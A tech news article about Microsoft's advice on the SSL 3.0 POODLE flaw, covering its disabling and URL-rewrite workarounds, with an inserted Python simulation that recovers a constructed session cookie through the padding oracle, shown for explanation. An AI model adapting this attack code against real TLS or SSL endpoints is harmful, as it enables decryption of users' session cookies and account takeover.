Microsoft Issues Advice on SSL 3.0 Security Vulnerability

Microsoft is offering more guidance regarding a Secure Sockets Layer (SSL) 3.0 security flaw, including how to disable SSL 3.0 for users of Exchange Server and Azure Websites.

SSL 3.0 is an older version of the protocol that encrypts Web traffic carried over HTTPS. It has a flaw in how its cipher-block-chaining (CBC) padding is handled: the padding bytes are not covered by the record's integrity check, and the receiver inspects only the final length byte. That gives an attacker who can tamper with encrypted records and watch which ones the server rejects a "padding oracle," which can be used to decrypt information such as authentication cookies, according to Microsoft. The U.S. Computer Emergency Readiness Team (US-CERT) issued a notice about SSL 3.0 earlier this month. The flaw was first disclosed by researchers who named their technique the Padding Oracle On Downgraded Legacy Encryption (POODLE) attack.

The POODLE attack works in two steps: the attacker first interferes with the connection so that a client that would normally negotiate TLS falls back to the flawed SSL 3.0 protocol, and then exploits the padding flaw. SSL 3.0 is an older protocol that has largely been replaced by the Transport Layer Security (TLS) protocol, which doesn't have this security flaw, according to US-CERT.

For the SSL 3.0 flaw to be exploited, attackers have to conduct a so-called "man-in-the-middle" attack, positioning themselves between the client and the server and also getting the victim's browser to send many requests, so the exploit is considered difficult to pull off. However, it could be exploited more easily on networks where such interception is practical, such as open or shared Wi-Fi networks, according to US-CERT.

Microsoft's Advice
On October 14, Microsoft issued a security advisory noting that all supported Windows Server software uses the SSL 3.0 protocol and is "affected by this vulnerability." The advisory added that the vulnerability was "not considered high risk to customers." The SSL 3.0 flaw isn't considered to be a high-risk problem because attackers would have to make "several hundred HTTPS requests before the attack could be successful," according to Microsoft; each decrypted byte of a secret costs about 256 requests on average, so a full cookie runs to thousands.
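The mechanics behind those numbers, as an added simulation that is not Microsoft's, US-CERT's or the researchers' code: a victim browser keeps sending the same cookie over an SSL 3.0-style record layer (MAC, then pad, then CBC-encrypt), the attacker chooses the URL and body lengths so the padding fills a whole block and a target cookie byte sits last in its block, then copies that block over the padding block and watches whether the server accepts the record. The cookie, keys and request layout are constructed for the example; a toy Feistel cipher stands in for AES and HMAC-SHA1 for the SSL 3.0 MAC, neither of which changes the attack. The same victim with the TLS 1.0 padding check (every padding byte must equal the length byte) resists it.

```python
"""POODLE padding-oracle simulation (added example, not the page's own code)."""
import hashlib
import hmac
import os

BLOCK = 16    # cipher block size
MAC_LEN = 20  # HMAC-SHA1 tag length
ROUNDS = 4


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(key, rnd, half):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def encrypt_block(key, block):
    """Toy 16-byte Feistel cipher standing in for AES (not secure, irrelevant to the attack)."""
    l, r = block[:8], block[8:]
    for rnd in range(ROUNDS):
        l, r = r, _xor(l, _round_fn(key, rnd, r))
    return l + r


def decrypt_block(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        l, r = _xor(r, _round_fn(key, rnd, l)), l
    return l + r


def seal_record(enc_key, mac_key, plaintext, strict_padding=False):
    """SSL 3.0 order: MAC, then pad, then CBC-encrypt. SSL 3.0 leaves the padding
    bytes unspecified (random here); TLS 1.0 sets each one to pad_len. Returns IV || ciphertext."""
    body = plaintext + hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    pad_len = BLOCK - 1 - len(body) % BLOCK            # 0..15: a full block when len % 16 == 0
    body += (bytes([pad_len]) * pad_len if strict_padding else os.urandom(pad_len)) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    out, prev = [iv], iv
    for i in range(0, len(body), BLOCK):
        prev = encrypt_block(enc_key, _xor(body[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def open_record(enc_key, mac_key, record, strict_padding=False):
    """Receiver check. SSL 3.0 (strict_padding=False) reads only the length byte;
    TLS 1.0 (strict_padding=True) also requires every padding byte to equal pad_len."""
    blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
    if len(blocks) < 2:
        return False
    plain = b"".join(_xor(decrypt_block(enc_key, c), p) for p, c in zip(blocks, blocks[1:]))
    pad_len = plain[-1]
    if pad_len >= BLOCK or len(plain) < pad_len + 1 + MAC_LEN:
        return False
    if strict_padding and any(b != pad_len for b in plain[-pad_len - 1:-1]):
        return False
    data, tag = plain[:-pad_len - 1 - MAC_LEN], plain[-pad_len - 1 - MAC_LEN:-pad_len - 1]
    return hmac.compare_digest(tag, hmac.new(mac_key, data, hashlib.sha1).digest())


SECRET_COOKIE = b"deadbeef"          # constructed session cookie the attacker is after
REQ_HEAD, REQ_MID = b"GET /", b" HTTP/1.1\r\nCookie: sid="


class Victim:
    """The browser that keeps resending the cookie, plus the server that validates records."""

    def __init__(self, strict_padding=False):
        self.strict, self.enc_key, self.mac_key = strict_padding, os.urandom(16), os.urandom(16)

    def send(self, path_len, body_len):
        # Attacker-controlled JavaScript picks the URL length and body length; that is all POODLE needs.
        req = REQ_HEAD + b"A" * path_len + REQ_MID + SECRET_COOKIE + b"\r\n" + b"B" * body_len
        return seal_record(self.enc_key, self.mac_key, req, self.strict)

    def server_accepts(self, record):
        return open_record(self.enc_key, self.mac_key, record, self.strict)


def find_full_padding(victim, path_len):
    """Grow the body a byte at a time until the record gains a whole block: at that size
    the padding is exactly one full block (pad_len == 15), which the attack requires."""
    prev = len(victim.send(path_len, 0))
    for body_len in range(1, BLOCK + 1):
        cur = len(victim.send(path_len, body_len))
        if cur > prev:
            return body_len
        prev = cur
    raise RuntimeError("record length never grew; layout assumption broken")


def recover_byte(victim, k, max_tries=20000):
    """Recover SECRET_COOKIE[k] from the accept/reject oracle. Returns (byte, tries),
    or (None, max_tries) if the oracle never fires, as with the TLS 1.0 check."""
    fixed = len(REQ_HEAD) + len(REQ_MID) + k
    path_len = (BLOCK - 1 - fixed) % BLOCK          # place cookie[k] last in its plaintext block
    target = (fixed + path_len) // BLOCK + 1        # its ciphertext block (index 0 is the IV)
    body_len = find_full_padding(victim, path_len)
    for tries in range(1, max_tries + 1):
        rec = victim.send(path_len, body_len)
        blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
        forged = b"".join(blocks[:-1]) + blocks[target]   # C_target replaces the padding block
        if victim.server_accepts(forged):
            # Accepted only when D(C_target)[15] ^ C_{n-1}[15] == 15; since
            # D(C_target) == P_target ^ C_{target-1}, the plaintext byte follows.
            return (BLOCK - 1) ^ blocks[target - 1][-1] ^ blocks[-2][-1], tries
    return None, max_tries


def recover_cookie(victim, length):
    """Each byte costs about 256 requests on average: 1/256 chance that the copied block's last byte decrypts to 15."""
    return bytes(recover_byte(victim, k)[0] for k in range(length))


if __name__ == "__main__":
    print("SSL 3.0 victim:", recover_cookie(Victim(), len(SECRET_COOKIE)))
    print("TLS 1.0 padding check:", recover_byte(Victim(strict_padding=True), 0, max_tries=2000))
```

The request counts reported by `recover_byte` are what Microsoft's "several hundred HTTPS requests" refers to; the run with `strict_padding=True` returns `None` because random padding bytes almost never all equal 15, which is why TLS is not affected in the same way.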

Microsoft's advisory offers workarounds that include disabling SSL 3.0 in Internet Explorer (an Internet Options setting) and in Windows itself (a Schannel protocol setting in the registry, which applies to every service on the machine that uses Schannel, such as IIS). However, doing so will cause clients that cannot negotiate TLS and rely on SSL 3.0 to fail in their server connections.

Microsoft recently offered additional advice for addressing the SSL 3.0 vulnerability, particularly for those using Exchange Server 2010 or Exchange Server 2013, as well as Azure Websites, Roles and Windows Virtual Machines.

For Exchange Server users, disabling SSL 3.0 on Windows Server will cut off clients that don't support the more current TLS protocol, according to Microsoft; they won't be able to connect to the server. Because the setting is server-wide, it also affects other software on the same machine, such as IIS, whose clients might not support TLS. Users can test whether their browser clients are subject to POODLE attacks via a test page linked from Microsoft's announcement.

URL Rewrite Rule
Microsoft also indicated that Azure Websites, Roles and Windows Virtual Machines enable the SSL 3.0 protocol by default. SSL 3.0 can be disabled for those services, although Microsoft cautions that "we encourage customers to evaluate the risk of regression before implementing these changes." Alternatively, IT pros can "configure a custom action" that runs when a browser connects over SSL 3.0. The custom action is an IIS URL rewrite rule, a configuration snippet provided by Microsoft.

Security expert and Microsoft MVP Troy Hunt prefers using the URL rewrite rule over disabling SSL 3.0 on Azure. The reason is that disabling SSL 3.0 will likely cause connection problems for a small number of users. With the URL rewrite rule, the SSL 3.0 connection is still made, but the attacker doesn't get the information needed to conduct an exploit, Hunt explained in a blog post.

Hunt doesn't recommend ignoring the SSL 3.0 flaw. "Yes, this means that taking no action leaves you vulnerable," he wrote.

About the Author

Kurt Mackie is senior news producer for 1105 Media's Converge360 group.
